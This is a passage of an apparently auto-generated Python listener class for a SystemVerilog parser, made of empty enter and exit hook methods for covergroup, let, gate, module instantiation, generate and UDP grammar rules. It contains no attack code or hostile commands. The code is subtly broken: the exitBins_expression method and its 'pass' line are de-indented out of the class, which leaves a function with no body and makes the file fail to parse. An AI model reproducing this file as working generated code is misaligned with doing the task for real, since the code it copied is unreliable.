    # Enter a parse tree produced by SystemVerilogParser#list_of_cross_items.
    def enterList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_cross_items.
    def exitList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cross_item.
    def enterCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cross_item.
    def exitCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cross_body.
    def enterCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cross_body.
    def exitCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cross_body_item.
    def enterCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cross_body_item.
    def exitCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_selection_or_option.
    def enterBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#bins_selection_or_option.
    def exitBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_selection.
    def enterBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#bins_selection.
    def exitBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#select_expression.
    def enterSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#select_expression.
    def exitSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#select_condition.
    def enterSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#select_condition.
    def exitSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#bins_expression.
    def enterBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
        pass
# Exit a parse tree produced by SystemVerilogParser#bins_expression.
def exitBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
pass
    # NOTE(review): empty listener hooks for covergroup range/value and
    # covergroup expression rules. No-op stubs to be overridden by subclasses.
    # Enter a parse tree produced by SystemVerilogParser#covergroup_range_list.
    def enterCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#covergroup_range_list.
    def exitCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#covergroup_value_range.
    def enterCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#covergroup_value_range.
    def exitCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#with_covergroup_expression.
    def enterWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#with_covergroup_expression.
    def exitWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#set_covergroup_expression.
    def enterSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#set_covergroup_expression.
    def exitSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
    def enterInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
    def exitInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cross_set_expression.
    def enterCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cross_set_expression.
    def exitCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#covergroup_expression.
    def enterCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#covergroup_expression.
    def exitCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
        pass
    # NOTE(review): empty listener hooks for the let-construct rules
    # (let_declaration .. let_actual_arg). No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#let_declaration.
    def enterLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_declaration.
    def exitLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_identifier.
    def enterLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_identifier.
    def exitLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_port_list.
    def enterLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_port_list.
    def exitLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_port_item.
    def enterLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_port_item.
    def exitLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_formal_type.
    def enterLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_formal_type.
    def exitLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_expression.
    def enterLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_expression.
    def exitLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_list_of_arguments.
    def enterLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_list_of_arguments.
    def exitLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#let_actual_arg.
    def enterLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#let_actual_arg.
    def exitLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
        pass
    # NOTE(review): empty listener hooks for gate instantiation rules
    # (switch/gate instances and pull strengths). No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#gate_instantiation.
    def enterGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#gate_instantiation.
    def exitGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#cmos_switch_instance.
    def enterCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cmos_switch_instance.
    def exitCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#enable_gate_instance.
    def enterEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#enable_gate_instance.
    def exitEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#mos_switch_instance.
    def enterMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#mos_switch_instance.
    def exitMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#n_input_gate_instance.
    def enterN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#n_input_gate_instance.
    def exitN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#n_output_gate_instance.
    def enterN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#n_output_gate_instance.
    def exitN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pass_switch_instance.
    def enterPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pass_switch_instance.
    def exitPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
    def enterPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
    def exitPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pull_gate_instance.
    def enterPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pull_gate_instance.
    def exitPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pulldown_strength.
    def enterPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pulldown_strength.
    def exitPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pullup_strength.
    def enterPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pullup_strength.
    def exitPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
        pass
    # NOTE(review): empty listener hooks for gate terminal rules. No-op stubs.
    # Enter a parse tree produced by SystemVerilogParser#enable_terminal.
    def enterEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#enable_terminal.
    def exitEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#inout_terminal.
    def enterInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#inout_terminal.
    def exitInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#input_terminal.
    def enterInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#input_terminal.
    def exitInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#ncontrol_terminal.
    def enterNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#ncontrol_terminal.
    def exitNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#output_terminal.
    def enterOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#output_terminal.
    def exitOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pcontrol_terminal.
    def enterPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pcontrol_terminal.
    def exitPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
        pass
    # NOTE(review): empty listener hooks for switch/gate type keyword rules.
    # No-op stubs to be overridden by subclasses.
    # Enter a parse tree produced by SystemVerilogParser#cmos_switchtype.
    def enterCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#cmos_switchtype.
    def exitCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#enable_gatetype.
    def enterEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#enable_gatetype.
    def exitEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#mos_switchtype.
    def enterMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#mos_switchtype.
    def exitMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#n_input_gatetype.
    def enterN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#n_input_gatetype.
    def exitN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#n_output_gatetype.
    def enterN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#n_output_gatetype.
    def exitN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pass_en_switchtype.
    def enterPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pass_en_switchtype.
    def exitPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pass_switchtype.
    def enterPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pass_switchtype.
    def exitPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
        pass
    # NOTE(review): empty listener hooks for module instantiation, parameter
    # assignment, and port connection rules. No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#module_instantiation.
    def enterModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#module_instantiation.
    def exitModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#parameter_value_assignment.
    def enterParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#parameter_value_assignment.
    def exitParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
    def enterList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
    def exitList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
    def enterOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
    def exitOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#named_parameter_assignment.
    def enterNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#named_parameter_assignment.
    def exitNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#hierarchical_instance.
    def enterHierarchical_instance(self, ctx:SystemVerilogParser.Hierarchical_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#hierarchical_instance.
    def exitHierarchical_instance(self, ctx:SystemVerilogParser.Hierarchical_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#name_of_instance.
    def enterName_of_instance(self, ctx:SystemVerilogParser.Name_of_instanceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#name_of_instance.
    def exitName_of_instance(self, ctx:SystemVerilogParser.Name_of_instanceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_port_connections.
    def enterList_of_port_connections(self, ctx:SystemVerilogParser.List_of_port_connectionsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_port_connections.
    def exitList_of_port_connections(self, ctx:SystemVerilogParser.List_of_port_connectionsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#ordered_port_connection.
    def enterOrdered_port_connection(self, ctx:SystemVerilogParser.Ordered_port_connectionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#ordered_port_connection.
    def exitOrdered_port_connection(self, ctx:SystemVerilogParser.Ordered_port_connectionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#named_port_connection.
    def enterNamed_port_connection(self, ctx:SystemVerilogParser.Named_port_connectionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#named_port_connection.
    def exitNamed_port_connection(self, ctx:SystemVerilogParser.Named_port_connectionContext):
        pass
    # NOTE(review): empty listener hooks for interface/program/checker
    # instantiation rules. No-op stubs to be overridden by subclasses.
    # Enter a parse tree produced by SystemVerilogParser#interface_instantiation.
    def enterInterface_instantiation(self, ctx:SystemVerilogParser.Interface_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#interface_instantiation.
    def exitInterface_instantiation(self, ctx:SystemVerilogParser.Interface_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#program_instantiation.
    def enterProgram_instantiation(self, ctx:SystemVerilogParser.Program_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#program_instantiation.
    def exitProgram_instantiation(self, ctx:SystemVerilogParser.Program_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#checker_instantiation.
    def enterChecker_instantiation(self, ctx:SystemVerilogParser.Checker_instantiationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#checker_instantiation.
    def exitChecker_instantiation(self, ctx:SystemVerilogParser.Checker_instantiationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_checker_port_connections.
    def enterList_of_checker_port_connections(self, ctx:SystemVerilogParser.List_of_checker_port_connectionsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_checker_port_connections.
    def exitList_of_checker_port_connections(self, ctx:SystemVerilogParser.List_of_checker_port_connectionsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#ordered_checker_port_connection.
    def enterOrdered_checker_port_connection(self, ctx:SystemVerilogParser.Ordered_checker_port_connectionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#ordered_checker_port_connection.
    def exitOrdered_checker_port_connection(self, ctx:SystemVerilogParser.Ordered_checker_port_connectionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#named_checker_port_connection.
    def enterNamed_checker_port_connection(self, ctx:SystemVerilogParser.Named_checker_port_connectionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#named_checker_port_connection.
    def exitNamed_checker_port_connection(self, ctx:SystemVerilogParser.Named_checker_port_connectionContext):
        pass
    # NOTE(review): empty listener hooks for generate-construct rules
    # (generate_region .. generate_item). No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#generate_region.
    def enterGenerate_region(self, ctx:SystemVerilogParser.Generate_regionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#generate_region.
    def exitGenerate_region(self, ctx:SystemVerilogParser.Generate_regionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#loop_generate_construct.
    def enterLoop_generate_construct(self, ctx:SystemVerilogParser.Loop_generate_constructContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#loop_generate_construct.
    def exitLoop_generate_construct(self, ctx:SystemVerilogParser.Loop_generate_constructContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#genvar_initialization.
    def enterGenvar_initialization(self, ctx:SystemVerilogParser.Genvar_initializationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#genvar_initialization.
    def exitGenvar_initialization(self, ctx:SystemVerilogParser.Genvar_initializationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#genvar_iteration.
    def enterGenvar_iteration(self, ctx:SystemVerilogParser.Genvar_iterationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#genvar_iteration.
    def exitGenvar_iteration(self, ctx:SystemVerilogParser.Genvar_iterationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#conditional_generate_construct.
    def enterConditional_generate_construct(self, ctx:SystemVerilogParser.Conditional_generate_constructContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#conditional_generate_construct.
    def exitConditional_generate_construct(self, ctx:SystemVerilogParser.Conditional_generate_constructContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#if_generate_construct.
    def enterIf_generate_construct(self, ctx:SystemVerilogParser.If_generate_constructContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#if_generate_construct.
    def exitIf_generate_construct(self, ctx:SystemVerilogParser.If_generate_constructContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#case_generate_construct.
    def enterCase_generate_construct(self, ctx:SystemVerilogParser.Case_generate_constructContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#case_generate_construct.
    def exitCase_generate_construct(self, ctx:SystemVerilogParser.Case_generate_constructContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#case_generate_item.
    def enterCase_generate_item(self, ctx:SystemVerilogParser.Case_generate_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#case_generate_item.
    def exitCase_generate_item(self, ctx:SystemVerilogParser.Case_generate_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#generate_block.
    def enterGenerate_block(self, ctx:SystemVerilogParser.Generate_blockContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#generate_block.
    def exitGenerate_block(self, ctx:SystemVerilogParser.Generate_blockContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#generate_item.
    def enterGenerate_item(self, ctx:SystemVerilogParser.Generate_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#generate_item.
    def exitGenerate_item(self, ctx:SystemVerilogParser.Generate_itemContext):
        pass
    # NOTE(review): empty listener hooks for UDP declaration and body rules
    # (udp_nonansi_declaration .. init_val). No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#udp_nonansi_declaration.
    def enterUdp_nonansi_declaration(self, ctx:SystemVerilogParser.Udp_nonansi_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_nonansi_declaration.
    def exitUdp_nonansi_declaration(self, ctx:SystemVerilogParser.Udp_nonansi_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_ansi_declaration.
    def enterUdp_ansi_declaration(self, ctx:SystemVerilogParser.Udp_ansi_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_ansi_declaration.
    def exitUdp_ansi_declaration(self, ctx:SystemVerilogParser.Udp_ansi_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_declaration.
    def enterUdp_declaration(self, ctx:SystemVerilogParser.Udp_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_declaration.
    def exitUdp_declaration(self, ctx:SystemVerilogParser.Udp_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_port_list.
    def enterUdp_port_list(self, ctx:SystemVerilogParser.Udp_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_port_list.
    def exitUdp_port_list(self, ctx:SystemVerilogParser.Udp_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_declaration_port_list.
    def enterUdp_declaration_port_list(self, ctx:SystemVerilogParser.Udp_declaration_port_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_declaration_port_list.
    def exitUdp_declaration_port_list(self, ctx:SystemVerilogParser.Udp_declaration_port_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_port_declaration.
    def enterUdp_port_declaration(self, ctx:SystemVerilogParser.Udp_port_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_port_declaration.
    def exitUdp_port_declaration(self, ctx:SystemVerilogParser.Udp_port_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_output_declaration.
    def enterUdp_output_declaration(self, ctx:SystemVerilogParser.Udp_output_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_output_declaration.
    def exitUdp_output_declaration(self, ctx:SystemVerilogParser.Udp_output_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_input_declaration.
    def enterUdp_input_declaration(self, ctx:SystemVerilogParser.Udp_input_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_input_declaration.
    def exitUdp_input_declaration(self, ctx:SystemVerilogParser.Udp_input_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_reg_declaration.
    def enterUdp_reg_declaration(self, ctx:SystemVerilogParser.Udp_reg_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_reg_declaration.
    def exitUdp_reg_declaration(self, ctx:SystemVerilogParser.Udp_reg_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_body.
    def enterUdp_body(self, ctx:SystemVerilogParser.Udp_bodyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_body.
    def exitUdp_body(self, ctx:SystemVerilogParser.Udp_bodyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#combinational_body.
    def enterCombinational_body(self, ctx:SystemVerilogParser.Combinational_bodyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#combinational_body.
    def exitCombinational_body(self, ctx:SystemVerilogParser.Combinational_bodyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#combinational_entry.
    def enterCombinational_entry(self, ctx:SystemVerilogParser.Combinational_entryContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#combinational_entry.
    def exitCombinational_entry(self, ctx:SystemVerilogParser.Combinational_entryContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#sequential_body.
    def enterSequential_body(self, ctx:SystemVerilogParser.Sequential_bodyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequential_body.
    def exitSequential_body(self, ctx:SystemVerilogParser.Sequential_bodyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#udp_initial_statement.
    def enterUdp_initial_statement(self, ctx:SystemVerilogParser.Udp_initial_statementContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#udp_initial_statement.
    def exitUdp_initial_statement(self, ctx:SystemVerilogParser.Udp_initial_statementContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#init_val.
    def enterInit_val(self, ctx:SystemVerilogParser.Init_valContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#init_val.
    def exitInit_val(self, ctx:SystemVerilogParser.Init_valContext):
        pass
    # NOTE(review): empty listener hooks for UDP table entry/symbol rules
    # (sequential_entry .. edge_symbol). No-op stubs to be overridden.
    # Enter a parse tree produced by SystemVerilogParser#sequential_entry.
    def enterSequential_entry(self, ctx:SystemVerilogParser.Sequential_entryContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#sequential_entry.
    def exitSequential_entry(self, ctx:SystemVerilogParser.Sequential_entryContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#seq_input_list.
    def enterSeq_input_list(self, ctx:SystemVerilogParser.Seq_input_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#seq_input_list.
    def exitSeq_input_list(self, ctx:SystemVerilogParser.Seq_input_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#level_input_list.
    def enterLevel_input_list(self, ctx:SystemVerilogParser.Level_input_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#level_input_list.
    def exitLevel_input_list(self, ctx:SystemVerilogParser.Level_input_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#edge_input_list.
    def enterEdge_input_list(self, ctx:SystemVerilogParser.Edge_input_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#edge_input_list.
    def exitEdge_input_list(self, ctx:SystemVerilogParser.Edge_input_listContext):
        pass
